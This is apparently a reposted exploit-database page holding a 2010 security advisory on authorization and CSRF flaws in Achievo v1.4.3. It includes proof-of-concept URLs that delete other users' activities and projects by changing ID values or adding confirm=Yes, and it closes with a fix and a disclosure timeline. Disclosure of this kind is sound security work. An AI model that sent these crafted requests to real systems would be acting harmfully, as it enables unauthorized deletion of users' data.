Home / os / win7

[webapps / 0day] - Achievo v1.4.3 Multiple Authorization Fla

Posted on 28 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Achievo v1.4.3 Multiple Authorization Flaws / CSRF Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 28 Sep 2010 | Exploit category: webapps / 0day | Exploit author: Cybsec Labs | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================================ Achievo v1.4.3 Multiple Authorization Flaws / CSRF Vulnerability ================================================================ Vulnerability Description: It is possible to create and delete arbitrary activities to and from arbitrary users by modifying IDs in client requests. Proof of Concept: 1) To add activities as another user, just change value of the parameter “person.id” in the POST request to “/dispatch.php” to any other valid person ID. 2) To delete activities from any user: http://server/dispatch.php?atknodetype=timereg.hours&amp;atkaction=delete&amp;atkselector=hoursbase.id=&#039;XXXX&#039; (where „XXXX. is the actual ID of the activity to be deleted) Solution: Upgrade to version 1.4.5 Vendor Response: 2010-Aug-04: Vendor is contacted 2010-Aug-05: Vulnerabilities details are sent to vendor 2010-Aug-25: Vendor informs status 2010-Sept-27: Vendor and researcher agree publication date 2010-Sept-28: Vulnerability public disclosure / Patch is released As application does not properly validate the “confirm” parameter in URL, a logged-in achievo user may be tricked to access an URL leading to deletion of tasks or projects without user.s confirmation Proof of Concept: 1) To delete a project: http://server/dispatch.php?atknodetype=project.project&amp;atkselector=project.id=&#039;XXXX&#039;&amp;atkaction=delete&amp;atklevel=1&amp;atkprevlevel=0&amp;confirm=Yes (where XXXX is the project ID number) 2) To delete an activity: http://server/dispatch.php?atknodetype=timereg.hours&amp;atkaction=delete&amp;atkselector=hoursbase.id=&#039;XXXX&#039;&amp;confirm=Yes (where „XXXX. is the actual ID of the activity to be deleted) Note: Even though a confirmation message is displayed to the user, at that point the activity has already been deleted. Solution: Upgrade to version 1.4.5 Vendor Response: 2010-Aug-04: Vendor is contacted 2010-Aug-05: Vulnerabilities details are sent to vendor 2010-Aug-25: Vendor informs status 2010-Sept-27: Vendor and researcher agree publication date 2010-Sept-28: Vulnerability public disclosure / Patch is released # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-28]</pre></body></html>

 

TOP